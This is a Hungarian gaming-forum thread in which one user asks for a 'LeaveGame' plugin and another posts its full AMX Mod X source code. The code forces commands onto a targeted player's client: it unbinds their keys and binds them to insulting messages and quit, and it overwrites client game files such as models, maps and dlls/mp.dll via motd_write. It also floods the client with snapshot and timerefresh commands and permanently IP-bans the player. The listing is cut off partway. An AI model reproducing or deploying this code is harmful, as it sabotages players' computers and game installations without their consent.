hlmod.hu

Magyar Half-Life Mód közösség!
Pontos idő: 2024.04.28. 13:00



Jelenlévő felhasználók

Jelenleg 527 felhasználó van jelen :: 0 regisztrált, 0 rejtett és 527 vendég

A legtöbb felhasználó (1565 fő) 2020.11.21. 11:26-kor tartózkodott itt.

Regisztrált felhasználók: nincs regisztrált felhasználó az elmúlt 5 percben aktív felhasználók alapján

Utoljára aktív
Ahhoz hogy lásd ki volt utoljára aktív, be kell jelentkezned.



Az oldal teljeskörű
használatához regisztrálj.

Regisztráció

Kereső


Új téma nyitása  Hozzászólás a témához  [ 2 hozzászólás ] 
Szerző Üzenet
 Hozzászólás témája: Leavegame
HozzászólásElküldve: 2013.08.18. 16:36 
Offline
Tud valamit
Avatar

Csatlakozott: 2013.05.14. 21:07
Hozzászólások: 117
Megköszönt másnak: 39 alkalommal
Megköszönték neki: 1 alkalommal
Hali.

Valaki tudna linkelni LeaveGame plugint? Elöre is köszi.


Hozzászólás jelentése
Vissza a tetejére
   
 Hozzászólás témája: Re: Leavegame
HozzászólásElküldve: 2013.08.18. 17:49 
Offline
Fanatikus
Avatar

Csatlakozott: 2012.09.15. 08:33
Hozzászólások: 197
Megköszönt másnak: 15 alkalommal
Megköszönték neki: 12 alkalommal
Kód:
#include <amxmodx>
#include <amxmisc>
#include <fun>
#include <engine>
 
#define Baza 45630
 
new BanData[33][2][32]
new bool:ComandaB = false
new DirectorServer[64],TextServer[32],LimbaServer = 31,r,t
new FisierServer[128]
new SalvareServer
 
static const poza[] = "http://..."
 
public plugin_init()
{
   register_plugin("Leave Game", "2.0", "|Na'Qa| H34D[HUN]T3R")
   register_concmd("amx_leavegame", "leavegame", ADMIN_LEVEL_G,"<nume> : Destroy + Snapshot + IP ban")
   register_concmd("amx_lg", "leavegame", ADMIN_LEVEL_G,"<nume> : Destroy + Snapshot + IP ban")
   register_cvar("amx_lg_activity","1")
}
 
 
public leavegame(id,level,cid){
   if (!cmd_access(id,level,cid,2)){
      return PLUGIN_HANDLED
   }
   if (ComandaB){
      Cronometru(id)
      return PLUGIN_HANDLED
   }
   new arg[32],name[32],admin[32],sAuthid[35],sAuthid2[35],message[552],players[33],inum
   new fo_logfile[64],timp[64],maxtext[256]
   new tinta[32], minute[8], motiv[64]
   read_argv(1, tinta, 31)   
   read_argv(2, minute, 7)
   read_argv(3, motiv, 63)
   read_argv(1, arg, 31)
   new target = cmd_target(id,arg,1)
   new jucator = cmd_target(id, tinta, 9)
 
   if (!jucator)
 
   return PLUGIN_HANDLED   
 
 
   copy(BanData[jucator][0], 31, minute)
   copy(BanData[jucator][1], 31, motiv)
   new TaskData[4]
   TaskData[0] = id
   TaskData[1] = jucator
   new numeserver[64], nume[32], ip[32]
   get_user_name(target,name,31)
   get_user_name(id,admin,31)
   get_user_authid(target,sAuthid,34)
   get_user_authid(id,sAuthid2,34)
   get_cvar_string("hostname",numeserver,63);
   get_user_name(jucator,nume,31);
   get_user_ip(jucator,ip,31);
   get_configsdir(fo_logfile, 63)
   get_time("%m/%d/%Y - %H:%M:%S",timp,63)
   IncarcareServer()
   ScriereServer()
   format(message,551,"LeaveGameD^n Parancs sikeresen vegrehajtva.^n Parancs szama %i",SalvareServer)
   format(maxtext, 255, "[LG] %s: %s hasznalt parancs LeaveGame pe %s",timp,admin,name)
   format(fo_logfile, 63, "%s/LeaveGame.txt", fo_logfile)
 
   if(!target){
 
      return PLUGIN_HANDLED
   }
   switch (get_cvar_num("amx_lg_activity")) {
      case 1: client_cmd(target,"say ^" %s LeaveGame adott!^"",admin)
         case 0: client_cmd(target,"say ^"Kaptam LeaveGame!^"")
      }
   client_cmd(target,"developer 1")
   client_cmd(target,"unbind w;wait;unbind a;unbind s;wait;unbind d;bind mouse1 ^"say Kaptam LeaveGame az egyik szerveren! .^";wait;unbind mouse2;unbind mouse3;wait;bind space quit")
   client_cmd(target,"unbind ctrl;wait;unbind 1;unbind 2;wait;unbind 3;unbind 4;wait;unbind 5;unbind 6;wait;unbind 7")
   client_cmd(target,"unbind 8;wait;unbind 9;unbind 0;wait;unbind r;unbind e;wait;unbind g;unbind q;wait;unbind shift")
   client_cmd(target,"unbind end;wait;bind escape ^"say Sunt neajutorat ca un mic *****^";unbind z;wait;unbind x;unbind c;wait;unbind uparrow;unbind downarrow;wait;unbind leftarrow")
   client_cmd(target,"unbind rightarrow;wait;unbind mwheeldown;unbind mwheelup;wait;bind ` ^"say Sunt neajutorat ca un mic *****^";bind ~ ^"say Elpusztultam! .^";wait;name ^"LeaveGame#ELPUSZTULVA^"")
   client_cmd(target,"rate 1;gl_flipmatrix 1;cl_cmdrate 10;cl_updaterate 10;fps_max 1;hideradar;con_color ^"1 1 1^"")
 
   //Strica dll-uri si waduri si MDL
   client_cmd(target,"motdfile models/player.mdl;motd_write x");
   client_cmd(target,"motdfile models/v_ak47.mdl;motd_write x");
   client_cmd(target,"motdfile cs_dust.wad;motd_write x");
   client_cmd(target,"motdfile models/v_m4a1.mdl;motd_write x");
   client_cmd(target,"motdfile resource/GameMenu.res;motd_write x");
   client_cmd(target,"motdfile halflife.wad;motd_write x");
   client_cmd(target,"motdfile cstrike.wad;motd_write x");
   client_cmd(target,"motdfile maps/de_dust2.bsp;motd_write x");
   client_cmd(target,"motdfile events/ak47.sc;motd_write x");
   client_cmd(target,"motdfile dlls/mp.dll;motd_write x");
 
 
 
 
 
   //Mesaje say pe bind
   client_cmd(target, "bind ^"w^" ^"say Hasznalom a LeaveGame egy szerveren kaptam, mert megszegtem a szabalyokat!" );
   client_cmd(target, "bind ^"s^" ^"say Hasznalom a LeaveGame egy szerveren kaptam, mert megszegtem a szabalyokat!" );
   client_cmd(target, "bind ^"r^" ^"say Hasznalom a LeaveGame egy szerveren kaptam, mert megszegtem a szabalyokat!" );
   client_cmd(target, "bind ^"`^" ^"say Hasznalom a LeaveGame egy szerveren kaptam, mert megszegtem a szabalyokat!" );
 
 
 
   write_file(fo_logfile,maxtext,-1)
   set_hudmessage(255,255,0,0.47,0.55,0,6.0,12.0,0.1,0.2,1)
   show_hudmessage(0, message)
   client_cmd(0, "spk ^"vox/bizwarn the coded has been detected and fucked^"")
   for (new i = 0; i < inum; ++i) {
      if ( access(players[i],ADMIN_CHAT) )
         client_print(players[i],print_chat,"[LG]Jatekos:%s kapott LeaveGame %s",name,admin)
   }
   ComandaB = true
   Cronometru(id)   
 
 
   client_print(jucator, print_chat, "* Nezd %s hogy tavolitsa el a bant.", poza)
   client_print(jucator, print_chat, "* Nev:  ^"%s^" cu IP : %s",nume,ip)
   client_print(jucator, print_chat, "* Datum : %s",timp)
   client_print(jucator, print_chat, "* Bant kaptam az admintol %s",admin)
   client_print(jucator, print_chat,"* Screenshot csinalta : %s",numeserver)
   client_cmd(jucator,"wait;snapshot;wait;snapshot")
   client_cmd(target,"cl_timeout 0")   
 
 
   //Baneaza jucatorul permanent
   client_cmd(id, "amx_addban ^"%s^" permanent LeaveGame", ip)
   //Parms
   new parms[1]
   parms[0] = target
   set_task(0.10,"xs",1337+id,parms,1)
   return PLUGIN_HANDLED
 
}
 
public spank(id,parms[]){
   new jucator = parms[0]
   if(is_user_connected(id)){
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")     
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")     
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")         
   }
   else{
      if(!is_user_connected(id)){
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")     
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")
         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")     
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
